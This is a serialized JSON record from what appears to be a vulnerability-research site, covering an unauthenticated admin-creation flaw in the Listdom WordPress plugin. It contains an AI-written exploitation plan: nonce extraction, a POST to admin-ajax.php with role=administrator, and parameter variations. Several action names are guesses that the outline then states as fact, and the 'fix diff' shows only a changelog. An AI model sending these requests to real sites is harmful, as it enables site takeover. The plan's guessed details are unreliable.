[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fMHkKiWEpOy0_Slj0OXH0LCb2FQNYBSu9eIBF806eyEM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-49063","listdom-ai-powered-business-directory-with-classifieds-ads-listings-unauthenticated-privilege-escalation","Listdom: AI-powered Business Directory with Classifieds Ads Listings \u003C= 5.5.0 - Unauthenticated Privilege Escalation","The Listdom: AI-powered Business Directory with Classifieds Ads Listings plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 5.5.0. This makes it possible for unauthenticated attackers to elevate their privileges.","listdom",null,"\u003C=5.5.0","5.6.0","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Incorrect Privilege Assignment","2026-06-08 00:00:00","2026-06-18 13:41:45",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fdbadc2e6-38fa-47f8-9d8b-79fb867f1003?source=api-prod",11,[22,23,24,25,26,27,28,29],"LSD.php","app\u002Fhtml\u002Fmenus\u002Fdashboard\u002Ftabs\u002Fchangelog.php","app\u002Fhtml\u002Fmenus\u002Fix\u002Ftabs\u002Fcsv\u002Fmapping.php","app\u002Fhtml\u002Fmenus\u002Fsettings\u002Ftabs.php","app\u002Fhtml\u002Fmenus\u002Fsettings\u002Ftabs\u002Fai.php","app\u002Fhtml\u002Fmenus\u002Fsettings\u002Ftabs\u002Fcustomizer.php","app\u002Fhtml\u002Fmenus\u002Fsettings\u002Ftabs\u002Fgeneral.php","app\u002Fhtml\u002Fmetaboxes\u002Flisting\u002Fmap\u002Fgooglemap.php","researched",false,3,"This research plan focuses on **CVE-2026-49063**, an unauthenticated privilege escalation vulnerability in the **Listdom** plugin.\n\n## 1. Vulnerability Summary\nThe Listdom plugin (\u003C= 5.5.0) is vulnerable to **Unauthenticated Privilege Escalation**. This occurs because the plugin's registration or profile-handling AJAX actions (likely managed by `LSD_Ajax` and `LSD_Author`) fail to restrict the `role` parameter when creating or updating a user. An unauthenticated attacker can send a crafted request to the WordPress AJAX endpoint to create a new user with the `administrator` role.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `lsd_register_user` (inferred) or `lsd_submit_listing` (inferred).\n*   **Vulnerable Parameter:** `role` (or a nested parameter like `user[role]`).\n*   **Authentication:** None required (uses `wp_ajax_nopriv_*` hooks).\n*   **Preconditions:** User registration must be enabled in Listdom settings, or the \"Add Listing\" feature must be accessible to guests (common in directory plugins).\n\n## 3. Code Flow\n1.  The `Listdom` class constructor (`LSD.php`) initializes `LSD_Ajax` (line 217) and `LSD_Author` (line 144).\n2.  `LSD_Ajax` registers a \"nopriv\" (unauthenticated) AJAX handler for registration: `add_action('wp_ajax_nopriv_lsd_register_user', ...)`.\n3.  The handler receives input from `$_POST`.\n4.  The handler calls `wp_insert_user($user_data)` or `wp_create_user()`.\n5.  If `$user_data` is populated directly from `$_POST` without filtering the `role` key, WordPress assigns the specified role (e.g., `administrator`) to the new user.\n\n## 4. Nonce Acquisition Strategy\nListdom uses `wp_localize_script` to pass security nonces to the frontend. Based on the plugin's naming convention (`LSD_`), the JS object is likely `lsd_obj`.\n\n**Execution Steps:**\n1.  **Identify Shortcode:** Listdom usually requires a registration or \"Add Listing\" shortcode to load its frontend assets. The most common is `[listdom_add_listing]`.\n2.  **Create Setup Page:**\n    ```bash\n    wp post create --post_type=page --post_title=\"Register\" --post_status=publish --post_content='[listdom_add_listing]'\n    ```\n3.  **Navigate and Extract:**\n    Use `browser_navigate` to the new page.\n    Use `browser_eval` to extract the nonce:\n    ```javascript\n    \u002F\u002F Inferred structure based on Listdom asset management\n    window.lsd_obj?.nonce || window.lsd_vars?.nonce\n    ```\n4.  **Verification:** If no nonce is found, the endpoint may not be protected by a nonce, or the action might use a different key. Check the page source for `admin-ajax.php` references and surrounding JSON.\n\n## 5. Exploitation Strategy\nThe goal is to register a new user and assign them the `administrator` role.\n\n**HTTP Request (via `http_request` tool):**\n*   **Method:** POST\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    ```text\n    action=lsd_register_user&\n    user_login=attacker_admin&\n    user_email=attacker@example.com&\n    password=P@ssword123!&\n    role=administrator&\n    nonce=[EXTRACTED_NONCE]\n    ```\n\n*Note: If the plugin expects a nested array, the body might look like `user[user_login]=...&user[role]=administrator`.*\n\n## 6. Test Data Setup\n1.  **Plugin Activation:** Ensure `listdom` is active.\n2.  **Registration Page:** Create a page with the `[listdom_add_listing]` or `[listdom_dashboard]` shortcode to trigger the necessary scripts and nonces.\n3.  **Settings (Optional):** If the exploit fails, use `wp option get lsd_settings` to check if guest submissions\u002Fregistrations are disabled and enable them if necessary to simulate a standard vulnerable configuration.\n\n## 7. Expected Results\n*   **HTTP Response:** A success JSON (e.g., `{\"success\":true,...}`) or a redirect to a dashboard.\n*   **Database State:** A new entry in the `wp_users` table with the login `attacker_admin`.\n*   **Privilege State:** The user `attacker_admin` should have the `administrator` role in the `wp_usermeta` table (under `wp_capabilities`).\n\n## 8. Verification Steps\nAfter the HTTP request, verify the success via WP-CLI:\n```bash\n# Check if the user was created\nwp user list --field=user_login | grep \"attacker_admin\"\n\n# Check the user's role\nwp user get attacker_admin --field=roles\n```\nThe output should be `administrator`.\n\n## 9. Alternative Approaches\nIf `lsd_register_user` is not the correct action name:\n1.  **Search Source:** Use `grep -r \"wp_ajax_nopriv\" .` in the plugin directory to find all unauthenticated AJAX entry points.\n2.  **Profile Update:** If registration is restricted, look for `lsd_update_profile` (inferred). If an existing subscriber can update their own profile and include a `role` parameter, the impact is the same.\n3.  **Parameter Variation:** Try `role=administrator`, `user_role=administrator`, or `lsd[role]=administrator`.","The Listdom plugin for WordPress is vulnerable to unauthenticated privilege escalation in versions up to and including 5.5.0. This vulnerability exists because the plugin's AJAX handlers for user registration or profile updates fail to sanitize or restrict the 'role' parameter, allowing an attacker to specify and receive the 'administrator' role.","\u002F\u002F LSD.php line 144\n$author = new LSD_Author();\n$author->init();\n\n---\n\n\u002F\u002F LSD.php line 217\n$ajax = new LSD_Ajax();\n$ajax->init();","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Flistdom\u002F5.5.0\u002Fapp\u002Fhtml\u002Fmenus\u002Fdashboard\u002Ftabs\u002Fchangelog.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Flistdom\u002F5.6.0\u002Fapp\u002Fhtml\u002Fmenus\u002Fdashboard\u002Ftabs\u002Fchangelog.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Flistdom\u002F5.5.0\u002Fapp\u002Fhtml\u002Fmenus\u002Fdashboard\u002Ftabs\u002Fchangelog.php\t2026-05-13 02:38:38.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Flistdom\u002F5.6.0\u002Fapp\u002Fhtml\u002Fmenus\u002Fdashboard\u002Ftabs\u002Fchangelog.php\t2026-06-07 23:46:22.000000000 +0000\n@@ -3,6 +3,19 @@\n defined('ABSPATH') || die();\n ?>\n \u003Cdiv class=\"lsd-changelog-wrap\">\n+    \u003Ch2>v5.6.0 \u003Cspan>June 7th, 2026\u003C\u002Fspan>\u003C\u002Fh2>\n+    \u003Cul class=\"lsd-changelog\">\n+        \u003Cli>\u003C?php esc_html_e('Added AI-powered search with structured and semantic options, model settings, and connector approval notices.', 'listdom'); ?>\u003C\u002Fli>\n+        \u003Cli>\u003C?php esc_html_e('Added a Back Button element for single listing pages.', 'listdom'); ?>\u003C\u002Fli>\n+        \u003Cli>\u003C?php esc_html_e('Added new single listing controls for attribute visibility, listing links, and timeline skin output in connected shortcodes.', 'listdom'); ?>\u003C\u002Fli>\n+        \u003Cli>\u003C?php esc_html_e('Added week-start options for date pickers and improved date fields in search forms.', 'listdom'); ?>\u003C\u002Fli>\n+        \u003Cli>\u003C?php esc_html_e('Added an image-centered taxonomy shortcode style.', 'listdom'); ?>\u003C\u002Fli>\n+        \u003Cli>\u003C?php esc_html_e('Improved map and direction button behavior, including refreshed cluster icons and cleaner Google map interactions.', 'listdom'); ?>\u003C\u002Fli>\n+        \u003Cli>\u003C?php esc_html_e('Refined frontend and backend UI details for search fields, modals, tooltips, badges, icons, and listing inputs.', 'listdom'); ?>\u003C\u002Fli>\n+        \u003Cli>\u003C?php esc_html_e('Improved AI search reliability with better caching, duplicate job prevention, and semantic search interface polish.', 'listdom'); ?>\u003C\u002Fli>\n+        \u003Cli>\u003C?php esc_html_e('Fixed import, API, and listing save reliability issues, including attribute slugs, metadata overwrite protection, and file size enforcement.', 'listdom'); ?>\u003C\u002Fli>\n+        \u003Cli>\u003C?php esc_html_e('Fixed duplicate notifications, frontend auth role handling, and safer listing data handling.', 'listdom'); ?>\u003C\u002Fli>\n+    \u003C\u002Ful>\n     \u003Ch2>v5.5.0 \u003Cspan>May 12th, 2026\u003C\u002Fspan>\u003C\u002Fh2>\n     \u003Cul class=\"lsd-changelog\">\n         \u003Cli>\u003C?php esc_html_e('Updated Italian translations for Listdom and its addons.', 'listdom'); ?>\u003C\u002Fli>","The exploit targets unauthenticated AJAX actions such as 'lsd_register_user'. An attacker first identifies a page containing a Listdom registration or listing submission form (e.g., via the [listdom_add_listing] shortcode) to extract a security nonce from the 'lsd_obj' or 'lsd_vars' JavaScript objects. The attacker then sends a POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' containing the registration action, user details (login, email, password), and a 'role' parameter set to 'administrator'. Because the plugin's backend logic directly uses the 'role' parameter from the request when calling user creation functions like wp_insert_user(), the new user is created with full administrative privileges.","gemini-3-flash-preview","2026-06-26 02:23:38","2026-06-26 02:24:45",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","5.5.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Flistdom\u002Ftags\u002F5.5.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flistdom.5.5.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Flistdom\u002Ftags\u002F5.6.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flistdom.5.6.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Flistdom\u002Ftags"]